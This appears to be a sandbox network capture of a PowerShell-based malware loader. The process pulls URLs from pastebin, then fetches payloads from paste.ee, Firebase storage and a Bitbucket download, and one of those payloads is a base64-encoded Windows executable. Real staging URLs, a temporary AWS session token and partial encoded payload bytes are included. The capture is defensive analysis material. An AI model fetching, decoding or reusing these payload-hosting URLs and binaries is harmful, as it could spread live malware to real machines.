Content-Security-Policy: script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net https://remote-app-switcher.prod-east.frontend.public.atl-paas.net https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; base-uri 'self'; object-src 'none'; frame-ancestors 'self' start.atlassian.com start.stg.atlassian.com atlaskit.atlassian.com bitbucket.org; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod.public.atl-paas.net as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com xp.atlassian.com atl-global.atlassian.c [TRUNCATED]
X-Usage-Quota-Remaining: 999145.950
X-Usage-Request-Cost: 866.23
X-Usage-User-Time: 0.020627
X-Usage-System-Time: 0.005360
X-Usage-Input-Ops: 0
X-Usage-Output-Ops: 0
Age: 0
X-Cache: MISS
X-Content-Type-Options: nosniff
X-Xss-Protection: 1; mode=block
Atl-Traceid: 7e9ee825fd3145a9b0b5daf02ab0c10a
Report-To: {"endpoints": [{"url": "https://dz8aopenkvv6s.cloudfront.net"}], "group": "endpoint-1", "include_subdomains": true, "max_age": 600}
Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"}
Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
Server-Timing: atl-edge;dur=152,atl-edge-internal;dur=2,atl-edge-upstream;dur=150,atl-edge-pop;desc="aws-eu-central-1"
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 49707 | 52.216.144.11 | 443 | 6400 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 04:53:09 UTC | 1217 | OUT | GET /5c1faa65-8df1-44b3-9eef-4905cfb21066/downloads/153f1b3b-a7e8-4b91-b2b1-19798dd254b2/dsadsdsadsadsa.txt?response-content-disposition=attachment%3B%20filename%3D%22dsadsdsadsadsa.txt%22&AWSAccessKeyId=ASIA6KOSE3BNKASUWRVB&Signature=GfpU0CqDcq625CnXQ2BwtNOiGJM%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEG0aCXVzLWVhc3QtMSJHMEUCIQDs8Rj4z4voHrA56yVpXNvb%2FsFKDQyxi%2B3o3W5qfuWusQIgLqQzvBFMFXX9Pa%2BoyIG%2B32jske%2BWh0S25%2Fynj2NB%2BBcqsAIItv%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDMxhE6dop%2BJnHoLfPiqEAr8pHVnooTfi0YZkbhehEoaE1HM1hw7hoHIkopPIOTznsgPJgLmSVn4zaLDAXaFsXvcbpwil5pqs3yLuDuXNAyT6tr7PxdlycD%2FAJaRj7XgTxDLyt2nktlqdkRlEDXnBOTxrFM34uHRZq4gQIcXM%2FdeP1gNTHuVllr4hqgc8BtyPI0oFU6TWGdV61p4JgXiTcM8X%2Fs7Y2pNAaZQaYh1Kwk80bLwXYNBkJqe6fudHaku2Hr19n%2FI7ovUAmCunSxhwXenqzPnDzZTCwFDsnRaZo0mTJvCImTLI6KCQcZQtPWh0Q7P%2BZ8u6QsTrnfwdgKJJpE7FElvkKACOC6bBrj07%2FazaST1qMKXB%2BLcGOp0BIzHMRr4XYnUMQ24ozLJjMYALd1nwf%2BbKAue7hm%2By1s%2B%2BelqorxCz52uzxR1zc6F5j%2F8PF66cEvqBdIobKudxk1ywppJrtepYoNJnvllkE9hTI8QXxVteGCBkiJsAP [TRUNCATED]
Host: bbuseruploads.s3.amazonaws.com
Connection: Keep-Alive
2024-10-03 04:53:09 UTC | 532 | IN | HTTP/1.1 200 OK
x-amz-id-2: yJbd0TDyqmR/wwOrU8w19vEqzLHDmjfuRJZAFaWwl1vK1ZG6uQOJI73h0gJ42Y9rROKYgG3WmWI=
x-amz-request-id: VQ9ZX2N9XR3NN1N4
Date: Thu, 03 Oct 2024 04:53:10 GMT
Last-Modified: Thu, 03 Oct 2024 02:55:57 GMT
ETag: "d56deb4b43b26b748bc2d1b71f2b2745"
x-amz-server-side-encryption: AES256
x-amz-version-id: bnHQMdnIBnCcgFolFg0Y53FDW8.EhoTE
Content-Disposition: attachment; filename="dsadsdsadsadsa.txt"
Accept-Ranges: bytes
Content-Type: text/plain
Server: AmazonS3
Content-Length: 12972
Connection: close
2024-10-03 04:53:09 UTC | 12972 | IN | Data Raw: 54 56 71 51 41 41 4d 41 41 41 41 45 41 41 41 41 2f 2f 38 41 41 4c 67 41 41 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 41 41 41 41 41 34 66 75 67 34 41 74 41 6e 4e 49 62 67 42 54 4d 30 68 56 47 68 70 63 79 42 77 63 6d 39 6e 63 6d 46 74 49 47 4e 68 62 6d 35 76 64 43 42 69 5a 53 42 79 64 57 34 67 61 57 34 67 52 45 39 54 49 47 31 76 5a 47 55 75 44 51 30 4b 4a 41 41 41 41 41 41 41 41 41 42 51 52 51 41 41 54 41 45 44 41 4f 34 46 2f 6d 59 41 41 41 41 41 41 41 41 41 41 4f 41 41 49 69 41 4c 41 56 41 41 41 42 34 41 41 41 41 47 41 41 41 41 41 41 41 41 50 6a 77 41 41 41 41 67 41 41 41 41 41 41 41 41 41 41 41 41 45 41 41 67 41 41 41 41 41 67 41
Data Ascii: TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAO4F/mYAAAAAAAAAAOAAIiALAVAAAB4AAAAGAAAAAAAAPjwAAAAgAAAAAAAAAAAAEAAgAAAAAgA


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
3          | 192.168.2.5 | 49708       | 104.20.4.235   | 443              | 6400 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp               | Bytes transferred | Direction | Data
2024-10-03 04:53:10 UTC | 50                | OUT       | GET /raw/sFgsbG3v HTTP/1.1
    Host: pastebin.com
2024-10-03 04:53:10 UTC | 391               | IN        | HTTP/1.1 200 OK
    Date: Thu, 03 Oct 2024 04:53:10 GMT
    Content-Type: text/plain; charset=utf-8
    Transfer-Encoding: chunked
    Connection: close
    x-frame-options: DENY
    x-content-type-options: nosniff
    x-xss-protection: 1;mode=block
    cache-control: public, max-age=1801
    CF-Cache-Status: EXPIRED
    Last-Modified: Thu, 03 Oct 2024 04:53:10 GMT
    Server: cloudflare
    CF-RAY: 8cca53b41bf38c7d-EWR
2024-10-03 04:53:10 UTC | 142               | IN        | Data Ascii: 88https://firebasestorage.googleapis.com/v0/b/rodriakd-8413d.appspot.com/o/Pe%2Fp.txt?alt=media&token=a7402e30-731b-402a-ab65-b4ffbdbe890d
2024-10-03 04:53:10 UTC | 5                 | IN        | Data Ascii: 0


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
4          | 192.168.2.5 | 49710       | 104.20.4.235   | 443              | 6400 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp               | Bytes transferred | Direction | Data
2024-10-03 04:53:12 UTC | 50                | OUT       | GET /raw/cD7bJS7b HTTP/1.1
    Host: pastebin.com
2024-10-03 04:53:13 UTC | 388               | IN        | HTTP/1.1 200 OK
    Date: Thu, 03 Oct 2024 04:53:13 GMT
    Content-Type: text/plain; charset=utf-8
    Transfer-Encoding: chunked
    Connection: close
    x-frame-options: DENY
    x-content-type-options: nosniff
    x-xss-protection: 1;mode=block
    cache-control: public, max-age=1801
    CF-Cache-Status: MISS
    Last-Modified: Thu, 03 Oct 2024 04:53:13 GMT
    Server: cloudflare
    CF-RAY: 8cca53c4ce20de97-EWR
2024-10-03 04:53:13 UTC | 32                | IN        | Data Ascii: 1ahttps://paste.ee/d/lHbHo/0
2024-10-03 04:53:13 UTC | 5                 | IN        | Data Ascii: 0


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
5          | 192.168.2.5 | 49711       | 188.114.96.3   | 443              | 6400 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp               | Bytes transferred | Direction | Data
2024-10-03 04:53:14 UTC | 67                | OUT       | GET /d/lHbHo/0 HTTP/1.1
    Host: paste.ee
    Connection: Keep-Alive
2024-10-03 04:53:14 UTC | 1200              | IN        | HTTP/1.1 200 OK
    Date: Thu, 03 Oct 2024 04:53:14 GMT
    Content-Type: text/plain; charset=utf-8
    Transfer-Encoding: chunked
    Connection: close
    Cache-Control: max-age=2592000
    strict-transport-security: max-age=63072000
    x-frame-options: DENY
    x-content-type-options: nosniff
    x-xss-protection: 1; mode=block
    content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none'
    cf-cache-status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=k6onGmFIzPxqj3cE9xQSS9k90uaIKPC5l2Ak68C7iDYRcu54Rs8q%2FJST5izVhpUdxQdNiLyuOd8mqsHY02cJTWaSmzzhFNlXeB9yEDcRqN9EedcMfMshHHktqg%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8cca53cb4a5d17b1-EWR
2024-10-03 04:53:14 UTC | 10 rows, 169 to 1369 bytes each | IN | [chunked base64-like payload, Data Raw / Data Ascii omitted]


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
6          | 192.168.2.5 | 49722       | 104.20.4.235   | 443              | 7096 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp               | Bytes transferred | Direction | Data
2024-10-03 04:53:28 UTC | 74                | OUT       | GET /raw/V9y5Q5vv HTTP/1.1
    Host: pastebin.com
    Connection: Keep-Alive
2024-10-03 04:53:28 UTC | 396               | IN        | HTTP/1.1 200 OK
    Date: Thu, 03 Oct 2024 04:53:28 GMT
    Content-Type: text/plain; charset=utf-8
    Transfer-Encoding: chunked
    Connection: close
    x-frame-options: DENY
    x-content-type-options: nosniff
    x-xss-protection: 1;mode=block
    cache-control: public, max-age=1801
    CF-Cache-Status: HIT
    Age: 21
    Last-Modified: Thu, 03 Oct 2024 04:53:07 GMT
    Server: cloudflare
    CF-RAY: 8cca5424c9104228-EWR
2024-10-03 04:53:28 UTC | 83                | IN        | Data Ascii: 4dhttps://bitbucket.org/89999999999999/acaaaaaaaaa/downloads/dsadsdsadsadsa.txt
2024-10-03 04:53:28 UTC | 5                 | IN        | Data Ascii: 0


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
7          | 192.168.2.5 | 49723       | 185.166.143.50 | 443              | 7096 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp               | Bytes transferred | Direction | Data
2024-10-03 04:53:29 UTC | 118               | OUT       | GET /89999999999999/acaaaaaaaaa/downloads/dsadsdsadsadsa.txt HTTP/1.1
    Host: bitbucket.org
    Connection: Keep-Alive
2024-10-03 04:53:29 UTC | 5124              | IN        | HTTP/1.1 302 Found
    Date: Thu, 03 Oct 2024 04:53:29 GMT
    Content-Type: text/html; charset=utf-8
    Content-Length: 0
    Server: AtlassianEdge
    Location: https://bbuseruploads.s3.amazonaws.com/5c1faa65-8df1-44b3-9eef-4905cfb21066/downloads/153f1b3b-a7e8-4b91-b2b1-19798dd254b2/dsadsdsadsadsa.txt?response-content-disposition=attachment%3B%20filename%3D%22dsadsdsadsadsa.txt%22&AWSAccessKeyId=ASIA6KOSE3BNKASUWRVB&Signature=GfpU0CqDcq625CnXQ2BwtNOiGJM%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEG0aCXVzLWVhc3QtMSJHMEUCIQDs8Rj4z4voHrA56yVpXNvb%2FsFKDQyxi%2B3o3W5qfuWusQIgLqQzvBFMFXX9Pa%2BoyIG%2B32jske%2BWh0S25%2Fynj2NB%2BBcqsAIItv%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDMxhE6dop%2BJnHoLfPiqEAr8pHVnooTfi0YZkbhehEoaE1HM1hw7hoHIkopPIOTznsgPJgLmSVn4zaLDAXaFsXvcbpwil5pqs3yLuDuXNAyT6tr7PxdlycD%2FAJaRj7XgTxDLyt2nktlqdkRlEDXnBOTxrFM34uHRZq4gQIcXM%2FdeP1gNTHuVllr4hqgc8BtyPI0oFU6TWGdV61p4JgXiTcM8X%2Fs7Y2pNAaZQaYh1Kwk80bLwXYNBkJqe6fudHaku2Hr19n%2FI7ovUAmCunSxhwXenqzPnDzZTCwFDsnRaZo0mTJvCImTLI6KCQcZQtPWh0Q7P%2BZ8u6QsTrnfwdgKJJpE7FElvkKACOC6bBrj07%2FazaST1qMKXB%2BLcGOp0BIzHMRr4XYnUMQ24ozLJjMYALd1nwf%2BbKAue7hm%2By1s%2B%2BelqorxCz52uzxR1zc6F5j%2F8PF66cEvqBdIobK [TRUNCATED]
    Expires: Thu, 03 Oct 2024 04:53:29 GMT
    Cache-Control: max-age=0, no-cache, no-store, must-revalidate, private
    X-Used-Mesh: False
    Vary: Accept-Language, Origin
    Content-Language: en
    X-View-Name: bitbucket.apps.downloads.views.download_file
    X-Dc-Location: Micros-3
    X-Served-By: 8e5620d07ccd
    X-Version: c0c21fc30b85
    X-Static-Version: c0c21fc30b85
    X-Request-Count: 1715
    X-Render-Time: 0.061300039291381836
    X-B3-Traceid: 17f529b8de2d409aadcb599e8571bd01
    X-B3-Spanid: ef8946490929621e
    X-Frame-Options: SAMEORIGIN
    Content-Security-Policy: object-src 'none'; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; base-uri 'self'; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod.public.atl-paas.net as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com xp.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.stat [TRUNCATED]
    X-Usage-Quota-Remaining: 999089.629
    X-Usage-Request-Cost: 928.30
    X-Usage-User-Time: 0.027433
    X-Usage-System-Time: 0.000416
    X-Usage-Input-Ops: 0
    X-Usage-Output-Ops: 0
    Age: 0
    X-Cache: MISS
    X-Content-Type-Options: nosniff
    X-Xss-Protection: 1; mode=block
    Atl-Traceid: 17f529b8de2d409aadcb599e8571bd01
    Report-To: {"endpoints": [{"url": "https://dz8aopenkvv6s.cloudfront.net"}], "group": "endpoint-1", "include_subdomains": true, "max_age": 600}
    Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"}
    Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
    Server-Timing: atl-edge;dur=171,atl-edge-internal;dur=3,atl-edge-upstream;dur=169,atl-edge-pop;desc="aws-eu-central-1"
    Connection: close


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
8          | 192.168.2.5 | 49724       | 3.5.25.83      | 443              | 7096 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp               | Bytes transferred | Direction | Data
2024-10-03 04:53:30 UTC | 1217              | OUT       | GET /5c1faa65-8df1-44b3-9eef-4905cfb21066/downloads/153f1b3b-a7e8-4b91-b2b1-19798dd254b2/dsadsdsadsadsa.txt?response-content-disposition=attachment%3B%20filename%3D%22dsadsdsadsadsa.txt%22&AWSAccessKeyId=ASIA6KOSE3BNKASUWRVB&Signature=GfpU0CqDcq625CnXQ2BwtNOiGJM%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEG0aCXVzLWVhc3QtMSJHMEUCIQDs8Rj4z4voHrA56yVpXNvb%2FsFKDQyxi%2B3o3W5qfuWusQIgLqQzvBFMFXX9Pa%2BoyIG%2B32jske%2BWh0S25%2Fynj2NB%2BBcqsAIItv%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDMxhE6dop%2BJnHoLfPiqEAr8pHVnooTfi0YZkbhehEoaE1HM1hw7hoHIkopPIOTznsgPJgLmSVn4zaLDAXaFsXvcbpwil5pqs3yLuDuXNAyT6tr7PxdlycD%2FAJaRj7XgTxDLyt2nktlqdkRlEDXnBOTxrFM34uHRZq4gQIcXM%2FdeP1gNTHuVllr4hqgc8BtyPI0oFU6TWGdV61p4JgXiTcM8X%2Fs7Y2pNAaZQaYh1Kwk80bLwXYNBkJqe6fudHaku2Hr19n%2FI7ovUAmCunSxhwXenqzPnDzZTCwFDsnRaZo0mTJvCImTLI6KCQcZQtPWh0Q7P%2BZ8u6QsTrnfwdgKJJpE7FElvkKACOC6bBrj07%2FazaST1qMKXB%2BLcGOp0BIzHMRr4XYnUMQ24ozLJjMYALd1nwf%2BbKAue7hm%2By1s%2B%2BelqorxCz52uzxR1zc6F5j%2F8PF66cEvqBdIobKudxk1ywppJrtepYoNJnvllkE9hTI8QXxVteGCBkiJsAP [TRUNCATED]
    Host: bbuseruploads.s3.amazonaws.com
    Connection: Keep-Alive
2024-10-03 04:53:30 UTC | 552               | IN        | HTTP/1.1 200 OK
    x-amz-id-2: E2kER0EQf9qAvQAdwrTTk/3ZVqgTSal8s2om87im37OZ0VY/ffActcISXMb+YxkrbSLKDE9cSDfjN0rA2mJ5DE+tx07Vk5cl
    x-amz-request-id: 1N9SGR8A6MYV9CK3
    Date: Thu, 03 Oct 2024 04:53:31 GMT
    Last-Modified: Thu, 03 Oct 2024 02:55:57 GMT
    ETag: "d56deb4b43b26b748bc2d1b71f2b2745"
    x-amz-server-side-encryption: AES256
    x-amz-version-id: bnHQMdnIBnCcgFolFg0Y53FDW8.EhoTE
    Content-Disposition: attachment; filename="dsadsdsadsadsa.txt"
    Accept-Ranges: bytes
    Content-Type: text/plain
    Server: AmazonS3
    Content-Length: 12972
    Connection: close
2024-10-03 04:53:30 UTC | 3452 + 9520 (two rows) | IN | [base64-encoded PE file (decodes to an MZ header), 12972 bytes in total, Data Raw / Data Ascii omitted]


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            9 | 192.168.2.5 | 49725 | 104.20.4.235 | 443 | 7096 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            2024-10-03 04:53:31 UTC | 50 | OUT | GET /raw/sFgsbG3v HTTP/1.1
                                                            Host: pastebin.com
                                                            2024-10-03 04:53:31 UTC | 396 | IN | HTTP/1.1 200 OK
                                                            Date: Thu, 03 Oct 2024 04:53:31 GMT
                                                            Content-Type: text/plain; charset=utf-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            x-frame-options: DENY
                                                            x-content-type-options: nosniff
                                                            x-xss-protection: 1;mode=block
                                                            cache-control: public, max-age=1801
                                                            CF-Cache-Status: HIT
                                                            Age: 21
                                                            Last-Modified: Thu, 03 Oct 2024 04:53:10 GMT
                                                            Server: cloudflare
                                                            CF-RAY: 8cca54378c95c34a-EWR
                                                            2024-10-03 04:53:31 UTC | 142 | IN | Data Raw: 38 38 0d 0a 68 74 74 70 73 3a 2f 2f 66 69 72 65 62 61 73 65 73 74 6f 72 61 67 65 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 76 30 2f 62 2f 72 6f 64 72 69 61 6b 64 2d 38 34 31 33 64 2e 61 70 70 73 70 6f 74 2e 63 6f 6d 2f 6f 2f 50 65 25 32 46 70 2e 74 78 74 3f 61 6c 74 3d 6d 65 64 69 61 26 74 6f 6b 65 6e 3d 61 37 34 30 32 65 33 30 2d 37 33 31 62 2d 34 30 32 61 2d 61 62 36 35 2d 62 34 66 66 62 64 62 65 38 39 30 64 0d 0a
                                                            Data Ascii: 88https://firebasestorage.googleapis.com/v0/b/rodriakd-8413d.appspot.com/o/Pe%2Fp.txt?alt=media&token=a7402e30-731b-402a-ab65-b4ffbdbe890d
                                                            2024-10-03 04:53:31 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            10 | 192.168.2.5 | 49727 | 104.20.4.235 | 443 | 7096 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            2024-10-03 04:53:34 UTC | 50 | OUT | GET /raw/cD7bJS7b HTTP/1.1
                                                            Host: pastebin.com
                                                            2024-10-03 04:53:34 UTC | 396 | IN | HTTP/1.1 200 OK
                                                            Date: Thu, 03 Oct 2024 04:53:34 GMT
                                                            Content-Type: text/plain; charset=utf-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            x-frame-options: DENY
                                                            x-content-type-options: nosniff
                                                            x-xss-protection: 1;mode=block
                                                            cache-control: public, max-age=1801
                                                            CF-Cache-Status: HIT
                                                            Age: 21
                                                            Last-Modified: Thu, 03 Oct 2024 04:53:13 GMT
                                                            Server: cloudflare
                                                            CF-RAY: 8cca544888a2c457-EWR
                                                            2024-10-03 04:53:34 UTC | 32 | IN | Data Raw: 31 61 0d 0a 68 74 74 70 73 3a 2f 2f 70 61 73 74 65 2e 65 65 2f 64 2f 6c 48 62 48 6f 2f 30 0d 0a
                                                            Data Ascii: 1ahttps://paste.ee/d/lHbHo/0
                                                            2024-10-03 04:53:34 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            11 | 192.168.2.5 | 49728 | 188.114.96.3 | 443 | 7096 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            2024-10-03 04:53:34 UTC | 67 | OUT | GET /d/lHbHo/0 HTTP/1.1
                                                            Host: paste.ee
                                                            Connection: Keep-Alive
                                                            2024-10-03 04:53:35 UTC | 1204 | IN | HTTP/1.1 200 OK
                                                            Date: Thu, 03 Oct 2024 04:53:35 GMT
                                                            Content-Type: text/plain; charset=utf-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Cache-Control: max-age=2592000
                                                            strict-transport-security: max-age=63072000
                                                            x-frame-options: DENY
                                                            x-content-type-options: nosniff
                                                            x-xss-protection: 1; mode=block
                                                            content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none'
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Jpj9%2FBDeFcTuPUnUAt50EfqJw8%2FE5CkxkRH%2BrBTVJeUff8PrbZkvSvlNvqDIeZBD6OkFD8JCDF3vvQO6mwpyIU8ktG6NgmrnuME7YkGd4S0HOvSyPB4tglguFA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8cca544c58c743fd-EWR
                                                            2024-10-03 04:53:35 UTC165INData Raw: 66 37 66 0d 0a 3d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                            Data Ascii: f7f=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                            2024-10-03 04:53:35 UTC1369INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                            2024-10-03 04:53:35 UTC1369INData Raw: 34 32 62 70 4e 6e 63 6c 5a 48 49 35 52 58 61 30 35 57 5a 6b 6c 55 65 73 4a 57 62 6c 4e 33 63 68 78 44 49 67 6f 51 44 2b 49 43 4d 75 45 6a 49 39 34 32 62 70 4e 6e 63 6c 5a 46 64 7a 56 6d 5a 70 35 57 59 74 42 69 49 78 59 6e 4c 74 4e 58 59 36 30 32 62 6a 31 43 64 6d 39 32 63 76 4a 33 59 70 31 57 4c 7a 46 57 62 6c 68 32 59 7a 70 6a 62 79 56 6e 49 39 4d 6e 62 73 31 47 65 67 6b 48 62 69 31 57 5a 7a 4e 58 59 38 6f 51 44 2b 38 6a 49 7a 56 57 65 69 30 54 5a 75 39 47 62 68 52 6d 62 68 52 33 63 67 49 43 4f 74 59 45 56 56 4a 53 50 6e 35 57 61 6b 39 32 59 75 56 47 49 69 41 6a 4c 78 49 53 50 75 39 57 61 7a 4a 58 5a 32 42 43 62 74 68 33 50 38 38 37 75 76 44 41 41 41 41 44 41 75 41 41 4d 41 34 43 41 77 41 67 4c 41 45 44 41 41 41 67 62 41 38 47 41 70 42 77 63 41 49 48 41
                                                            Data Ascii: 42bpNnclZHI5RXa05WZklUesJWblN3chxDIgoQD+ICMuEjI942bpNnclZFdzVmZp5WYtBiIxYnLtNXY602bj1Cdm92cvJ3Yp1WLzFWblh2YzpjbyVnI9Mnbs1GegkHbi1WZzNXY8oQD+8jIzVWei0TZu9GbhRmbhR3cgICOtYEVVJSPn5Wak92YuVGIiAjLxISPu9WazJXZ2BCbth3P887uvDAAAADAuAAMA4CAwAgLAEDAAAgbA8GApBwcAIHA
